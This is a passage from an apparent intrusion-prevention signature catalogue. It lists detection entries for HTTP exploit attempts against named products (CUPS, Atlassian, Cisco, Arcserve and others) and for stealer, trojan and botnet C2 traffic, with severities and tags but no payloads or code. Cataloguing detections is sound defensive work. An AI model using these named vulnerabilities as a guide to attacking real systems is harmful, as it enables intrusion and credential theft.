Tags: OS X, Any Hardware, Common UNIX Printing System, CVE2010, OS X not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-796-5211
Vulnerability: Apple-CUPS-IPP-Use-After-Free-Memory-Corruption
Description:
Back to top

HTTP_CS-Apple-CUPS-PNG-Filter-Overly-Large-Image-Height-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Common UNIX Printing System detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Common UNIX Printing System, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-388-4219
Vulnerability: Apple-CUPS-PNG-Filter-Overly-Large-Image-Height-Integer-Overflow
Description:
Back to top

HTTP_CS-Apple-CUPS-Sgi-Image-Format-Decoding-Imagetops-Filter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Common UNIX Printing System (CUPS) detected
Context: HTTP Client Stream
Severity: 7
Tags: Ubuntu Linux, SUSE Linux, Red Hat Enterprise Linux, Red Hat Linux, openSUSE, Any Hardware, Apple Common UNIX Printing System, CVE2008, SUSE Linux not specific, Red Hat Enterprise Linux not specific, Red Hat Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: Apple-CUPS-Sgi-Image-Format-Decoding-Imagetops-Filter-Buffer-Overflow
Description:
Back to top

HTTP_CS-AppRain-CMF-Arbitrary-PHP-File-Upload

About this situation: An attempt to exploit a AppRain CMF Arbitrary PHP File Upload vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AppRain, CVE2012, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Vulnerability: AppRain-CMF-Arbitrary-PHP-File-Upload
Description:
Back to top

HTTP_CS-APSystems-ECU-R-Command-Injection-CVE-2022-45699

About this situation: An attempt to exploit a vulnerability in APSystems ECU-R detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, APSystems ECU-R, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: APSystems-ECU-R-Command-Injection-CVE-2022-45699
Description:
Back to top

HTTP_CS-Arcserve-UDP-FileHandlingServlet-doUpload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Arcserve Unified Data Protection, CVE2023, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Arcserve-UDP-FileHandlingServlet-doUpload-Directory-Traversal
Description:
Back to top

HTTP_CS-Arcserve-Unified-Data-Protection-Getbackuppolicies-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Arcserve Unified Data Protection, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Arcserve-Unified-Data-Protection-Getbackuppolicies-Information-Disclosure
Description:
Back to top

HTTP_CS-Armageddon-Bot-Traffic

About this situation: Armageddon Bot traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Armageddon-Bot
Description:
Back to top

HTTP_CS-Artica-Proxy-FW-Progress-Details-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Artica Tech Artica Proxy detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Artica Tech Artica Proxy, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1276-5242
Vulnerability: Artica-Proxy-FW-Progress-Details-Directory-Traversal
Description:
Back to top

HTTP_CS-Artica-Proxy-Squid.conf-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Artica Proxy detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Artica Tech Artica Proxy, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1785-5242
Vulnerability: Artica-Proxy-Squid.conf-Authentication-Bypass
Description:
Back to top

HTTP_CS-Asn-1-Integer-BOF-MS04-007

About this situation: Detects exploits against the Microsoft ASN.1 library via a malformed SPNEGO token in HTTP Authorization field
Context: HTTP Client Stream
Severity: 10
Tags: Windows XP, Windows 2000, Windows 2003, Windows NT 4.0, Any Hardware, MS2004, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows NT 4.0 not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-158-2032
Vulnerability: Asn-1-Integer-BOF-MS04-007
Description:
Back to top

HTTP_CS-Asterisk-TLS-HTTP-Content-Length-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Asterisk Asterisk Open Source detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk Open Source, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Asterisk-TLS-HTTP-Content-Length-Denial-Of-Service
Description:
Back to top

HTTP_CS-AsusWRT-Lan-Unauthenticated-Remote-Code-Execution

About this situation: An AsusWRT LAN Unauthenticated Remote Code Execution Vulnerability
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AsusWRT, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: AsusWRT-Lan-Unauthenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Atlassian-Confluence-Data-Center-And-Server-addlanguage-RCE

About this situation: An attempt to exploit a vulnerability in Confluence Data Center and Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Atlassian Confluence, CVE2024, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1746-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Atlassian-Confluence-Data-Center-And-Server-addlanguage-RCE
Description:
Back to top

HTTP_CS-Atlassian-JIRA-Issue-Collector-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Atlassian-JIRA-Issue-Collector-Directory-Traversal
Description:
Back to top

HTTP_CS-Atlassian-JIRA-Template-Injection-CVE-2019-11581

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1179-5242
Vulnerability: Atlassian-JIRA-Template-Injection-CVE-2019-11581
Description:
Back to top

HTTP_CS-Axis-IP-Camera-Application-Upload

About this situation: An attempt to exploit a vulnerability in Axis IP cameras detected.
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, AXIS Camera Application Platform, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Axis-IP-Camera-Application-Upload
Description:
Back to top

HTTP_CS-Axis-Storpoint-Authentication-Bypass

About this situation: Axis Storpoint Authentication Bypass
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AXIS StorPoint, CVE2000, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Axis-Storpoint-Authentication-Bypass
Description:
Back to top

HTTP_CS-AZORult-Stealer-C2-Traffic

About this situation: AZORult stealer C2 traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1181-5242
Vulnerability: AZORult-Stealer-C2-Traffic
Description:
Back to top

HTTP_CS-Aztec-Forum-Admin-Password-Disclosure

About this situation: Admin password disclosure vulnerability in Aztec Forum
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Aztec Forum, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Aztec-Forum-Admin-Password-Disclosure
Description:
Back to top

HTTP_CS-Baldr-Botnet-Panel-Shell-Upload-Exploit

About this situation: An attempt to exploit a vulnerability in Baldr stealer malware control panel detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Baldr stealer malware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Vulnerability: Baldr-Botnet-Panel-Shell-Upload-Exploit
Description:
Back to top

HTTP_CS-Bankpatch-Trojan-Request

About this situation: Detected a request generated by W32/Bankpatch trojan
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-204-2032
Last changed: sgpkg-ips-1401-5242
Vulnerability: Bankpatch-Trojan-Request
Description:
Back to top

HTTP_CS-Barracuda-Spam-Firewall-Preview-Email-Command-Execution

About this situation: Detects directory traversal sequences given as argument to preview_email.cgi
Context: HTTP Client Stream
Severity: 7
Tags: Other, Any Hardware, Barracuda Spam Firewall, CVE2006, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-74-1314
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-Barracuda-Spam-Firewall-Preview-Email-Command-Execution
Description:
Back to top

HTTP_CS-BD-Wow32-Connect

About this situation: Wow32 backdoor detected
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Wow23, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Wow23-03
Description:
Back to top

HTTP_CS-Berbew-Webber-Padodor-Trojan-Log-Upload

About this situation: Keystroke log upload of Berbew/Webber/Padodor Trojan
Context: HTTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Berbew/Webber/Padodor Trojan, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-867-5242
Vulnerability: HTTP-Berbew-Webber-Padodor-Trojan-Log-Upload
Description:
Back to top

HTTP_CS-Bitcoin-Miner-Getwork-JSON-Request

About this situation: Bitcoin Miner Getwork JSON-RPC Request detected
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Bitcoin, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Bitcoin-Miner-Getwork-JSON-Request
Description:
Back to top

HTTP_CS-Blog-Torrent-Directory-Traversal

About this situation: Blog Torrent directory traversal attempt
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Blog Torrent, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Blog-Torrent-Directory-Traversal
Description:
Back to top

HTTP_CS-Blueimp-jQuery-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Blueimp detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Blueimp, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1174-5242
Vulnerability: Blueimp-jQuery-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-BoidCMS-Command-Injection

About this situation: An attempt to exploit a vulnerability in BoidCMS detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, BoidCMS, CVE2023, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1702-5242
Last changed: sgpkg-ips-1702-5242
Vulnerability: BoidCMS-Command-Injection
Description:
Back to top

HTTP_CS-Bolt-CMS-Authenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Bolt CMS detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Bolt CMS, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: Bolt-CMS-Authenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Borland-Starteam-Multicast-Service-HTTP-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Borland StarTeam Multicast Service detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Borland StarTeam, Borland StarTeam Multicast Service, Borland CaliberRM, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1590-5242
Vulnerability: Borland-Starteam-Multicast-Service-HTTP-Handling-Buffer-Overflow
Description:
Back to top

HTTP_CS-Breakingpoint-Generated-HTTP-Request-Message

About this situation: An identified HTTP Request message detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1374-5242
Description:
Back to top

HTTP_CS-CA-ARCserve-D2D-Credential-Disclosure

About this situation: An attempt to exploit a JCA ARCserve D2D Credential Disclosure vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA ARCserve D2D, CVE2011, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1733-5242
Vulnerability: CA-Arcserve-D2D-GWT-RPC-Request-Credentials-Disclosure
CA-ARCserve-D2D-Credential-Disclosure
Description:
Back to top

HTTP_CS-CA-Erwin-Web-Portal-Configserviceprovider-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in CA Erwin Web Portal detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Erwin Web Portal, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: CA-Erwin-Web-Portal-Configserviceprovider-Information-Disclosure
Description:
Back to top

HTTP_CS-CA-Erwin-Web-Portal-Configserviceprovider-Remote-File-Creation

About this situation: An attempt to exploit a vulnerability in CA Erwin Web Portal detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Erwin Web Portal, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-1499-5242
Vulnerability: CA-Erwin-Web-Portal-Configserviceprovider-Remote-File-Creation
Description:
Back to top

HTTP_CS-CA-Erwin-Web-Portal-Fileaccessserviceprovider-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in CA Erwin Web Portal detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Erwin Web Portal, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: CA-Erwin-Web-Portal-Fileaccessserviceprovider-Denial-Of-Service
Description:
Back to top

HTTP_CS-CA-Total-Defense-Suite-getDBConfigSettings-Credential-Disclosure

About this situation: An attempt to exploit a vulnerability in CA Total Defense Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Total Defense Suite, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Generic_CS-CA-Total-Defense-Suite-getDBConfigSettings-Credential-Disclosure
Description:
Back to top

HTTP_CS-CA-Total-Defense-Suite-SQL-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in CA Total Defense Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Total Defense Suite, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Generic_CS-CA-Total-Defense-Suite-SQL-Injection-Vulnerability
Description:
Back to top

HTTP_CS-CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection

About this situation: An attempt to exploit a vulnerability in CA Total Defense Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Total Defense Suite, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection
Description:
Back to top

HTTP_CS-Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1745-5242
Vulnerability: Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write
Description:
Back to top

HTTP_CS-Cacti-Group-Cacti-Package_import.php-Potential-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1745-5242
Vulnerability: Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write
Description:
Back to top

HTTP_CS-Carberp-Botnet-Traffic-Detected

About this situation: Carberp Botnet traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Carberp, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Carberp-Botnet
Description:
Back to top

HTTP_CS-Centreon-formMibs-Command-Injection

About this situation: An attempt to exploit a vulnerability in Centreon detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Centreon-formMibs-Command-Injection
Description:
Back to top

HTTP_CS-Certec-atvise-webMI2ADS-Denial-of-Service-2

About this situation: Certec atvise webMI2ADS denial of service.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Certec Atvise, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Certec-atvise-webMI2ADS-Denial-of-Service-2
Description:
Back to top

HTTP_CS-Cgiemail-Encoded-Newline-Spam-Proxy

About this situation: Cgiemail email header modification attempt
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MIT cgiemail, CVE2002, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Cgiemail-Encoded-Newline-Spam-Proxy
Description:
Back to top

HTTP_CS-Chamilo-BigUpload-WebShell

About this situation: An attempt to exploit a vulnerability in Chamilo
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chamilo, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Vulnerability: Chamilo-BigUpload-WebShell
Description:
Back to top

HTTP_CS-Check-Point-Security-Gateway-Information-Disclosure-CVE-2024-24919

About this situation: An attempt to exploit a vulnerability in Check Point Security Gateway detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Check Point Security Gateway, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Check-Point-Security-Gateway-Information-Disclosure-CVE-2024-24919
Description:
Back to top

HTTP_CS-ChurchInfo-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in ChurchInfo detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ChurchInfo, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Vulnerability: ChurchInfo-Authenticated-RCE
Description:
Back to top

HTTP_CS-Cisco-Adaptive-Security-Appliance-Webvpn-XML-Parser-Double-Free

About this situation: An attempt to exploit a vulnerability in Cisco Systems Adaptive Security Appliance (ASA) detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2018, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Vulnerability: Cisco-Adaptive-Security-Appliance-Webvpn-XML-Parser-Double-Free
Description:
Back to top

HTTP_CS-Cisco-Data-Center-Network-Manager-Getconfigtemplatefilename-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Getconfigtemplatefilename-SQL-Injection
Description:
Back to top

HTTP_CS-Cisco-Dcnm-TrustedClientTokenValidator-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Cisco Data Center Network Manager detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Cisco-Dcnm-TrustedClientTokenValidator-Authentication-Bypass
Description:
Back to top

HTTP_CS-Cisco-Hyperflex-Hx-Data-Platform-File-Upload-To-RCE

About this situation: An attempt to exploit a vulnerability in Cisco HyperFlex HX Data Platform detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Cisco HyperFlex, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: Cisco-Hyperflex-Hx-Data-Platform-File-Upload-To-RCE
Description:
Back to top

HTTP_CS-Cisco-IOS-XE-Command-Injection-CVE-2023-20273

About this situation: An attempt to exploit a vulnerability in Cisco IOS XE detected
Context: HTTP Client Stream
Severity: 7
Tags: Cisco, Any Hardware, CVE2023, Cisco not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Vulnerability: Cisco-IOS-XE-Command-Injection-CVE-2023-20273
Description:
Back to top

HTTP_CS-Cisco-Prime-Data-Center-Network-Manager-Fileupload-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Data Center Network Manager (DCNM) detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1645-5242
Vulnerability: Cisco-Prime-Data-Center-Network-Manager-Fileupload-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Cisco-Prime-Infrastructure-And-Epnm-Xmplogfilesdownloadservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Evolved Programmable Network Manager detected
